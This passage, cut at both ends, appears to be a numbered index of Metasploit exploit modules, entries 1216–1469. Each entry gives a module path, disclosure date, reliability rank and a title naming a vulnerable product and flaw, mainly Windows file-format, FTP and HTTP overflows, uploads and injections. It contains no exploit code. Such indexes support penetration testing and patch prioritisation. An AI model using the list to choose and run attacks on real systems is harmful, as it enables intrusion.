ShowReport Remote Command Execution + 1217 windows/fileformat/mediacoder_m3u 2013-06-24 normal No MediaCoder .M3U Buffer Overflow + 1218 windows/fileformat/mediajukebox 2009-07-01 normal No Media Jukebox 8.0.400 Buffer Overflow (SEH) + 1219 windows/fileformat/microp_mppl 2010-08-23 great No MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow + 1220 windows/fileformat/microsoft_windows_contact 2019-01-17 normal No Microsoft Windows Contact File Format Arbitary Code Execution + 1221 windows/fileformat/millenium_mp3_pls 2009-07-30 great No Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow + 1222 windows/fileformat/mini_stream_pls_bof 2010-07-16 great No Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow + 1223 windows/fileformat/mjm_coreplayer2011_s3m 2011-04-30 good No MJM Core Player 2011 .s3m Stack Buffer Overflow + 1224 windows/fileformat/mjm_quickplayer_s3m 2011-04-30 good No MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow + 1225 windows/fileformat/moxa_mediadbplayback 2010-10-19 average No MOXA MediaDBPlayback ActiveX Control Buffer Overflow + 1226 windows/fileformat/mplayer_m3u_bof 2011-03-19 average No MPlayer Lite M3U Buffer Overflow + 1227 windows/fileformat/mplayer_sami_bof 2011-05-19 normal No MPlayer SAMI Subtitle File Buffer Overflow + 1228 windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability + 1229 windows/fileformat/ms10_004_textbytesatom 2010-02-09 good No MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow + 1230 windows/fileformat/ms10_038_excel_obj_bof 2010-06-08 normal No MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow + 1231 windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) + 1232 windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great No MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow + 1233 windows/fileformat/ms11_021_xlb_bof 2011-08-09 normal No MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow + 1234 windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability + 1235 windows/fileformat/ms12_027_mscomctl_bof 2012-04-10 average No MS12-027 MSCOMCTL ActiveX Buffer Overflow + 1236 windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution + 1237 windows/fileformat/ms14_017_rtf 2014-04-01 normal No MS14-017 Microsoft Word RTF Object Confusion + 1238 windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution + 1239 windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python + 1240 windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution + 1241 windows/fileformat/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution + 1242 windows/fileformat/ms15_100_mcl_exe 2015-09-08 excellent No MS15-100 Microsoft Windows Media Center MCL Vulnerability + 1243 windows/fileformat/ms_visual_basic_vbp 2007-09-04 good No Microsoft Visual Basic VBP Buffer Overflow + 1244 windows/fileformat/mswin_tiff_overflow 2013-11-05 average No MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow + 1245 windows/fileformat/msworks_wkspictureinterface 2008-11-28 low No Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution + 1246 windows/fileformat/mymp3player_m3u 2010-03-18 good No Steinberg MyMP3Player 3.0 Buffer Overflow + 1247 windows/fileformat/netop 2011-04-28 normal No NetOp Remote Control Client 9.5 Buffer Overflow + 1248 windows/fileformat/nitro_reader_jsapi 2017-07-24 excellent No Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution + 1249 windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow + 1250 windows/fileformat/office_dde_delivery 2017-10-09 manual No Microsoft Office DDE Payload Delivery + 1251 windows/fileformat/office_excel_slk 2018-10-07 manual No Microsoft Excel .SLK Payload Delivery + 1252 windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 + 1253 windows/fileformat/office_ole_multiple_dll_hijack 2015-12-08 normal No Office OLE Multiple DLL Side Loading Vulnerabilities + 1254 windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution + 1255 windows/fileformat/openoffice_ole 2008-04-17 normal No OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow + 1256 windows/fileformat/orbit_download_failed_bof 2008-04-03 normal No Orbit Downloader URL Unicode Conversion Overflow + 1257 windows/fileformat/orbital_viewer_orb 2010-02-27 great No Orbital Viewer ORB File Parsing Buffer Overflow + 1258 windows/fileformat/ovf_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability + 1259 windows/fileformat/proshow_cellimage_bof 2009-08-20 great No ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow + 1260 windows/fileformat/proshow_load_bof 2012-06-06 normal No Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow + 1261 windows/fileformat/publishit_pui 2014-02-05 normal No Publish-It PUI Buffer Overflow (SEH) + 1262 windows/fileformat/real_networks_netzip_bof 2011-01-30 good No Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability + 1263 windows/fileformat/real_player_url_property_bof 2012-12-14 normal No RealPlayer RealMedia File Handling Buffer Overflow + 1264 windows/fileformat/realplayer_ver_attribute_bof 2013-12-20 normal No RealNetworks RealPlayer Version Attribute Buffer Overflow + 1265 windows/fileformat/safenet_softremote_groupname 2009-10-30 good No SafeNet SoftRemote GROUPNAME Buffer Overflow + 1266 windows/fileformat/sascam_get 2008-12-29 low No SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow + 1267 windows/fileformat/scadaphone_zip 2011-09-12 good No ScadaTEC ScadaPhone Stack Buffer Overflow + 1268 windows/fileformat/shadow_stream_recorder_bof 2010-03-29 normal No Shadow Stream Recorder 3.0.1.7 Buffer Overflow + 1269 windows/fileformat/shaper_pdf_bof 2015-10-03 normal No PDF Shaper Buffer Overflow + 1270 windows/fileformat/somplplayer_m3u 2010-01-22 great No S.O.M.P.L 1.0 Player Buffer Overflow + 1271 windows/fileformat/subtitle_processor_m3u_bof 2011-04-26 normal No Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow + 1272 windows/fileformat/syncbreeze_xml 2017-03-29 normal No Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow + 1273 windows/fileformat/tfm_mmplayer_m3u_ppl_bof 2012-03-23 good No TFM MMPlayer (m3u/ppl File) Buffer Overflow + 1274 windows/fileformat/total_video_player_ini_bof 2013-11-24 normal No Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow + 1275 windows/fileformat/tugzip 2008-10-28 good No TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability + 1276 windows/fileformat/ultraiso_ccd 2009-04-03 great No UltraISO CCD File Parsing Buffer Overflow + 1277 windows/fileformat/ultraiso_cue 2007-05-24 great No UltraISO CUE File Parsing Buffer Overflow + 1278 windows/fileformat/ursoft_w32dasm 2005-01-24 good No URSoft W32Dasm Disassembler Function Buffer Overflow + 1279 windows/fileformat/varicad_dwb 2010-03-17 great No VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow + 1280 windows/fileformat/videocharge_studio 2013-10-27 normal No VideoCharge Studio Buffer Overflow (SEH) + 1281 windows/fileformat/videolan_tivo 2008-10-22 good No VideoLAN VLC TiVo Buffer Overflow + 1282 windows/fileformat/videospirit_visprj 2011-04-11 good No VeryTools Video Spirit Pro + 1283 windows/fileformat/visio_dxf_bof 2010-05-04 good No Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability + 1284 windows/fileformat/visiwave_vwr_type 2011-05-20 great No VisiWave VWR File Parsing Vulnerability + 1285 windows/fileformat/vlc_mkv 2018-05-24 great No VLC Media Player MKV Use After Free + 1286 windows/fileformat/vlc_modplug_s3m 2011-04-07 average No VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow + 1287 windows/fileformat/vlc_realtext 2008-11-05 good No VLC Media Player RealText Subtitle Overflow + 1288 windows/fileformat/vlc_smb_uri 2009-06-24 great No VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow + 1289 windows/fileformat/vlc_webm 2011-01-31 good No VideoLAN VLC MKV Memory Corruption + 1290 windows/fileformat/vuplayer_cue 2009-08-18 good No VUPlayer CUE Buffer Overflow + 1291 windows/fileformat/vuplayer_m3u 2009-08-18 good No VUPlayer M3U Buffer Overflow + 1292 windows/fileformat/watermark_master 2013-11-01 normal No Watermark Master Buffer Overflow (SEH) + 1293 windows/fileformat/winamp_maki_bof 2009-05-20 normal No Winamp MAKI Buffer Overflow + 1294 windows/fileformat/winrar_ace 2019-02-05 excellent No RARLAB WinRAR ACE Format Input Validation Remote Code Execution + 1295 windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing + 1296 windows/fileformat/wireshark_mpeg_overflow 2014-03-20 good No Wireshark wiretap/mpeg.c Stack Buffer Overflow + 1297 windows/fileformat/wireshark_packet_dect 2011-04-18 good No Wireshark packet-dect.c Stack Buffer Overflow (local) + 1298 windows/fileformat/wm_downloader_m3u 2010-07-28 normal No WM Downloader 3.1.2.2 Buffer Overflow + 1299 windows/fileformat/xenorate_xpl_bof 2009-08-19 great No Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH) + 1300 windows/fileformat/xion_m3u_sehbof 2010-11-23 great No Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow + 1301 windows/fileformat/xradio_xrl_sehbof 2011-02-08 normal No xRadio 0.95b Buffer Overflow + 1302 windows/fileformat/zahir_enterprise_plus_csv 2018-09-28 normal No Zahir Enterprise Plus 6 Stack Buffer Overflow + 1303 windows/fileformat/zinfaudioplayer221_pls 2004-09-24 good No Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow + 1304 windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow + 1305 windows/firewall/kerio_auth 2003-04-28 average No Kerio Firewall 2.1.4 Authentication Packet Overflow + 1306 windows/ftp/32bitftp_list_reply 2010-10-12 good No 32bit FTP Client Stack Buffer Overflow + 1307 windows/ftp/3cdaemon_ftp_user 2005-01-04 average Yes 3Com 3CDaemon 2.0 FTP Username Overflow + 1308 windows/ftp/aasync_list_reply 2010-10-12 good No AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST) + 1309 windows/ftp/ability_server_stor 2004-10-22 normal Yes Ability Server 2.34 STOR Command Stack Buffer Overflow + 1310 windows/ftp/absolute_ftp_list_bof 2011-11-09 normal No AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow + 1311 windows/ftp/ayukov_nftp 2017-10-21 normal No Ayukov NFTP FTP Client Buffer Overflow + 1312 windows/ftp/bison_ftp_bof 2011-08-07 normal Yes BisonWare BisonFTP Server Buffer Overflow + 1313 windows/ftp/cesarftp_mkd 2006-06-12 average Yes Cesar FTP 0.99g MKD Command Buffer Overflow + 1314 windows/ftp/comsnd_ftpd_fmtstr 2012-06-08 good Yes ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability + 1315 windows/ftp/dreamftp_format 2004-03-03 good Yes BolinTech Dream FTP Server 1.02 Format String + 1316 windows/ftp/easyfilesharing_pass 2006-07-31 average Yes Easy File Sharing FTP Server 2.0 PASS Overflow + 1317 windows/ftp/easyftp_cwd_fixret 2010-02-16 great Yes EasyFTP Server CWD Command Stack Buffer Overflow + 1318 windows/ftp/easyftp_list_fixret 2010-07-05 great Yes EasyFTP Server LIST Command Stack Buffer Overflow + 1319 windows/ftp/easyftp_mkd_fixret 2010-04-04 great Yes EasyFTP Server MKD Command Stack Buffer Overflow + 1320 windows/ftp/filecopa_list_overflow 2006-07-19 average No FileCopa FTP Server Pre 18 Jul Version + 1321 windows/ftp/filewrangler_list_reply 2010-10-12 good No FileWrangler 5.30 Stack Buffer Overflow + 1322 windows/ftp/freefloatftp_user 2012-06-12 normal Yes Free Float FTP Server USER Command Buffer Overflow + 1323 windows/ftp/freefloatftp_wbem 2012-12-07 excellent Yes FreeFloat FTP Server Arbitrary File Upload + 1324 windows/ftp/freeftpd_pass 2013-08-20 normal Yes freeFTPd PASS Command Buffer Overflow + 1325 windows/ftp/freeftpd_user 2005-11-16 average Yes freeFTPd 1.0 Username Overflow + 1326 windows/ftp/ftpgetter_pwd_reply 2010-10-12 good No FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD) + 1327 windows/ftp/ftppad_list_reply 2010-10-12 good No FTPPad 1.2.0 Stack Buffer Overflow + 1328 windows/ftp/ftpshell51_pwd_reply 2010-10-12 good No FTPShell 5.1 Stack Buffer Overflow + 1329 windows/ftp/ftpshell_cli_bof 2017-03-04 normal No FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow + 1330 windows/ftp/ftpsynch_list_reply 2010-10-12 good No FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow + 1331 windows/ftp/gekkomgr_list_reply 2010-10-12 good No Gekko Manager FTP Client Stack Buffer Overflow + 1332 windows/ftp/globalscapeftp_input 2005-05-01 great No GlobalSCAPE Secure FTP Server Input Overflow + 1333 windows/ftp/goldenftp_pass_bof 2011-01-23 average Yes GoldenFTP PASS Stack Buffer Overflow + 1334 windows/ftp/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability + 1335 windows/ftp/kmftp_utility_cwd 2015-08-23 normal Yes Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow + 1336 windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow + 1337 windows/ftp/leapftp_list_reply 2010-10-12 good No LeapFTP 3.0.1 Stack Buffer Overflow + 1338 windows/ftp/leapftp_pasv_reply 2003-06-09 normal No LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow + 1339 windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow + 1340 windows/ftp/netterm_netftpd_user 2005-04-26 great Yes NetTerm NetFTPD USER Buffer Overflow + 1341 windows/ftp/odin_list_reply 2010-10-12 good No Odin Secure FTP 4.1 Stack Buffer Overflow (LIST) + 1342 windows/ftp/open_ftpd_wbem 2012-06-18 excellent Yes Open-FTPD 1.2 Arbitrary File Upload + 1343 windows/ftp/oracle9i_xdb_ftp_pass 2003-08-18 great Yes Oracle 9i XDB FTP PASS Overflow (win32) + 1344 windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Yes Oracle 9i XDB FTP UNLOCK Overflow (win32) + 1345 windows/ftp/pcman_put 2015-08-07 normal Yes PCMAN FTP Server Buffer Overflow - PUT Command + 1346 windows/ftp/pcman_stor 2013-06-27 normal Yes PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow + 1347 windows/ftp/proftp_banner 2009-08-25 normal No ProFTP 2.9 Banner Remote Buffer Overflow + 1348 windows/ftp/quickshare_traversal_write 2011-02-03 excellent Yes QuickShare File Server 1.2.1 Directory Traversal Vulnerability + 1349 windows/ftp/ricoh_dl_bof 2012-03-01 normal Yes Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow + 1350 windows/ftp/sami_ftpd_list 2013-02-27 low No Sami FTP Server LIST Command Buffer Overflow + 1351 windows/ftp/sami_ftpd_user 2006-01-24 normal Yes KarjaSoft Sami FTP Server v2.02 USER Overflow + 1352 windows/ftp/sasser_ftpd_port 2004-05-10 average No Sasser Worm avserve FTP PORT Buffer Overflow + 1353 windows/ftp/scriptftp_list 2011-10-12 good No ScriptFTP LIST Remote Buffer Overflow + 1354 windows/ftp/seagull_list_reply 2010-10-12 good No Seagull FTP v3.3 Build 409 Stack Buffer Overflow + 1355 windows/ftp/servu_chmod 2004-12-31 normal Yes Serv-U FTP Server Buffer Overflow + 1356 windows/ftp/servu_mdtm 2004-02-26 good Yes Serv-U FTPD MDTM Overflow + 1357 windows/ftp/slimftpd_list_concat 2005-07-21 great No SlimFTPd LIST Concatenation Overflow + 1358 windows/ftp/trellian_client_pasv 2010-04-11 normal No Trellian FTP Client 3.01 PASV Remote Buffer Overflow + 1359 windows/ftp/turboftp_port 2012-10-03 great Yes Turbo FTP Server 1.30.823 PORT Overflow + 1360 windows/ftp/vermillion_ftpd_port 2009-09-23 great Yes Vermillion FTP Daemon PORT Command Memory Corruption + 1361 windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow + 1362 windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow + 1363 windows/ftp/wftpd_size 2006-08-23 average No Texas Imperial Software WFTPD 3.23 SIZE Overflow + 1364 windows/ftp/winaxe_server_ready 2016-11-03 good No WinaXe 7.7 FTP Client Remote Buffer Overflow + 1365 windows/ftp/wing_ftp_admin_exec 2014-06-19 excellent Yes Wing FTP Server Authenticated Command Execution + 1366 windows/ftp/wsftp_server_503_mkd 2004-11-29 great Yes WS-FTP Server 5.03 MKD Overflow + 1367 windows/ftp/wsftp_server_505_xmd5 2006-09-14 average Yes Ipswitch WS_FTP Server 5.05 XMD5 Overflow + 1368 windows/ftp/xftp_client_pwd 2010-04-22 normal No Xftp FTP Client 3.0 PWD Remote Buffer Overflow + 1369 windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow + 1370 windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow + 1371 windows/games/mohaa_getinfo 2004-07-17 great No Medal of Honor Allied Assault getinfo Stack Buffer Overflow + 1372 windows/games/racer_503beta5 2008-08-10 great No Racer v0.5.3 Beta 5 Buffer Overflow + 1373 windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32) + 1374 windows/http/adobe_robohelper_authbypass 2009-09-23 excellent No Adobe RoboHelp Server 8 Arbitrary File Upload and Execute + 1375 windows/http/altn_securitygateway 2008-06-02 average Yes Alt-N SecurityGateway username Buffer Overflow + 1376 windows/http/altn_webadmin 2003-06-24 average No Alt-N WebAdmin USER Buffer Overflow + 1377 windows/http/amlibweb_webquerydll_app 2010-08-03 normal Yes Amlibweb NetOpacs webquery.dll Stack Buffer Overflow + 1378 windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding + 1379 windows/http/apache_mod_rewrite_ldap 2006-07-28 great Yes Apache Module mod_rewrite LDAP Protocol Buffer Overflow + 1380 windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow + 1381 windows/http/avaya_ccr_imageupload_exec 2012-06-28 excellent No Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution + 1382 windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow + 1383 windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow + 1384 windows/http/bea_weblogic_jsessionid 2009-01-13 good No BEA WebLogic JSESSIONID Cookie Value Overflow + 1385 windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow + 1386 windows/http/bea_weblogic_transfer_encoding 2008-09-09 great No BEA Weblogic Transfer-Encoding Buffer Overflow + 1387 windows/http/belkin_bulldog 2009-03-08 average No Belkin Bulldog Plus Web Service Buffer Overflow + 1388 windows/http/ca_arcserve_rpc_authbypass 2011-07-25 excellent No CA Arcserve D2D GWT RPC Credential Information Disclosure + 1389 windows/http/ca_igateway_debug 2005-10-06 average Yes CA iTechnology iGateway Debug Mode Buffer Overflow + 1390 windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent No CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection + 1391 windows/http/cogent_datahub_command 2014-04-29 manual Yes Cogent DataHub Command Injection + 1392 windows/http/cogent_datahub_request_headers_bof 2013-07-26 normal Yes Cogent DataHub HTTP Server Buffer Overflow + 1393 windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute + 1394 windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection + 1395 windows/http/desktopcentral_file_upload 2013-11-11 excellent Yes ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload + 1396 windows/http/desktopcentral_statusupdate_upload 2014-08-31 excellent Yes ManageEngine Desktop Central StatusUpdate Arbitrary File Upload + 1397 windows/http/disk_pulse_enterprise_bof 2016-10-03 excellent Yes Disk Pulse Enterprise Login Buffer Overflow + 1398 windows/http/disk_pulse_enterprise_get 2017-08-25 excellent Yes Disk Pulse Enterprise GET Buffer Overflow + 1399 windows/http/diskboss_get_bof 2016-12-05 excellent Yes DiskBoss Enterprise GET Buffer Overflow + 1400 windows/http/disksavvy_get_bof 2016-12-01 excellent Yes DiskSavvy Enterprise GET Buffer Overflow + 1401 windows/http/disksorter_bof 2017-03-15 great Yes Disk Sorter Enterprise GET Buffer Overflow + 1402 windows/http/dup_scout_enterprise_login_bof 2017-11-14 excellent Yes Dup Scout Enterprise Login Buffer Overflow + 1403 windows/http/dupscts_bof 2017-03-15 great Yes Dup Scout Enterprise GET Buffer Overflow + 1404 windows/http/easychatserver_seh 2017-10-09 normal No Easy Chat Server User Registeration Buffer Overflow (SEH) + 1405 windows/http/easyfilesharing_post 2017-06-12 normal No Easy File Sharing HTTP Server 7.2 POST Buffer Overflow + 1406 windows/http/easyfilesharing_seh 2015-12-02 normal No Easy File Sharing HTTP Server 7.2 SEH Overflow + 1407 windows/http/easyftp_list 2010-02-18 great Yes EasyFTP Server list.html path Stack Buffer Overflow + 1408 windows/http/edirectory_host 2006-10-21 great No Novell eDirectory NDS Server Host Header Overflow + 1409 windows/http/edirectory_imonitor 2005-08-11 great No eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow + 1410 windows/http/efs_easychatserver_username 2007-08-14 great Yes EFS Easy Chat Server Authentication Request Handling Buffer Overflow + 1411 windows/http/efs_fmws_userid_bof 2014-05-20 normal Yes Easy File Management Web Server Stack Buffer Overflow + 1412 windows/http/ektron_xslt_exec 2012-10-16 excellent Yes Ektron 8.02 XSLT Transform Remote Code Execution + 1413 windows/http/ektron_xslt_exec_ws 2015-02-05 excellent Yes Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution + 1414 windows/http/ericom_access_now_bof 2014-06-02 normal Yes Ericom AccessNow Server Buffer Overflow + 1415 windows/http/ezserver_http 2012-06-18 excellent No EZHomeTech EzServer Stack Buffer Overflow Vulnerability + 1416 windows/http/fdm_auth_header 2009-02-02 great No Free Download Manager Remote Control Server Buffer Overflow + 1417 windows/http/generic_http_dll_injection 2015-03-04 manual No Generic Web Application DLL Injection + 1418 windows/http/geutebrueck_gcore_x64_rce_bo 2017-01-24 normal Yes Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE + 1419 windows/http/gitstack_rce 2018-01-15 great No GitStack Unsanitized Argument RCE + 1420 windows/http/hp_autopass_license_traversal 2014-01-10 great Yes HP AutoPass License Server File Upload + 1421 windows/http/hp_imc_bims_upload 2013-10-08 excellent Yes HP Intelligent Management Center BIMS UploadServlet Directory Traversal + 1422 windows/http/hp_imc_java_deserialize 2017-10-03 excellent Yes HP Intelligent Management Java Deserialization RCE + 1423 windows/http/hp_imc_mibfileupload 2013-03-07 great Yes HP Intelligent Management Center Arbitrary File Upload + 1424 windows/http/hp_loadrunner_copyfiletoserver 2013-10-30 excellent Yes HP LoadRunner EmulationAdmin Web Service Directory Traversal + 1425 windows/http/hp_mpa_job_acct 2011-12-21 excellent Yes HP Managed Printing Administration jobAcct Remote Command Execution + 1426 windows/http/hp_nnm_getnnmdata_hostname 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow + 1427 windows/http/hp_nnm_getnnmdata_icount 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow + 1428 windows/http/hp_nnm_getnnmdata_maxage 2010-05-11 great No HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow + 1429 windows/http/hp_nnm_nnmrptconfig_nameparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig nameParams Buffer Overflow + 1430 windows/http/hp_nnm_nnmrptconfig_schdparams 2011-01-10 normal No HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow + 1431 windows/http/hp_nnm_openview5 2007-12-06 great No HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow + 1432 windows/http/hp_nnm_ovalarm_lang 2009-12-09 great No HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow + 1433 windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow + 1434 windows/http/hp_nnm_ovbuildpath_textfile 2011-11-01 normal No HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow + 1435 windows/http/hp_nnm_ovwebhelp 2009-12-09 great No HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow + 1436 windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow + 1437 windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow + 1438 windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great No HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow + 1439 windows/http/hp_nnm_snmp 2009-12-09 great No HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow + 1440 windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great No HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow + 1441 windows/http/hp_nnm_toolbar_01 2009-01-07 great No HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow + 1442 windows/http/hp_nnm_toolbar_02 2009-01-21 normal No HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow + 1443 windows/http/hp_nnm_webappmon_execvp 2010-07-20 great No HP OpenView Network Node Manager execvp_nc Buffer Overflow + 1444 windows/http/hp_nnm_webappmon_ovjavalocale 2010-08-03 great No HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow + 1445 windows/http/hp_openview_insight_backdoor 2011-01-31 excellent No HP OpenView Performance Insight Server Backdoor Account Code Execution + 1446 windows/http/hp_pcm_snac_update_certificates 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload + 1447 windows/http/hp_pcm_snac_update_domain 2013-09-09 excellent Yes HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload + 1448 windows/http/hp_power_manager_filename 2011-10-19 normal No HP Power Manager 'formExportDataLogs' Buffer Overflow + 1449 windows/http/hp_power_manager_login 2009-11-04 average No Hewlett-Packard Power Manager Administration Buffer Overflow + 1450 windows/http/hp_sitescope_dns_tool 2015-10-09 good No HP SiteScope DNS Tool Command Injection + 1451 windows/http/hp_sitescope_runomagentcommand 2013-07-29 manual Yes HP SiteScope Remote Code Execution + 1452 windows/http/httpdx_handlepeer 2009-10-08 great Yes HTTPDX h_handlepeer() Function Buffer Overflow + 1453 windows/http/httpdx_tolog_format 2009-11-17 great Yes HTTPDX tolog() Function Format String Vulnerability + 1454 windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow + 1455 windows/http/ibm_tivoli_endpoint_bof 2011-05-31 good No IBM Tivoli Endpoint Manager POST Query Buffer Overflow + 1456 windows/http/ibm_tpmfosd_overflow 2007-05-02 good No IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow + 1457 windows/http/ibm_tsm_cad_header 2007-09-24 good No IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + 1458 windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite + 1459 windows/http/integard_password_bof 2010-09-07 great No Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow + 1460 windows/http/intersystems_cache 2009-09-29 great No InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow + 1461 windows/http/intrasrv_bof 2013-05-30 manual Yes Intrasrv 1.0 Buffer Overflow + 1462 windows/http/ipswitch_wug_maincfgret 2004-08-25 great No Ipswitch WhatsUp Gold 8.03 Buffer Overflow + 1463 windows/http/jira_collector_traversal 2014-02-26 normal Yes JIRA Issues Collector Directory Traversal + 1464 windows/http/kaseya_uploader 2015-09-23 excellent Yes Kaseya VSA uploader.aspx Arbitrary File Upload + 1465 windows/http/kaseya_uploadimage_file_upload 2013-11-11 excellent Yes Kaseya uploadImage Arbitrary File Upload + 1466 windows/http/kolibri_http 2010-12-26 good Yes Kolibri HTTP Server HEAD Buffer Overflow + 1467 windows/http/landesk_thinkmanagement_upload_asp 2012-02-15 excellent No LANDesk Lenovo ThinkManagement Console Remote Command Execution + 1468 windows/http/lexmark_markvision_gfd_upload 2014-12-09 excellent Yes Lexmark MarkVision Enterprise Arbitrary File Upload + 1469 windows/http/mailenable_auth_header 2005-04-24 great Yes MailEnable 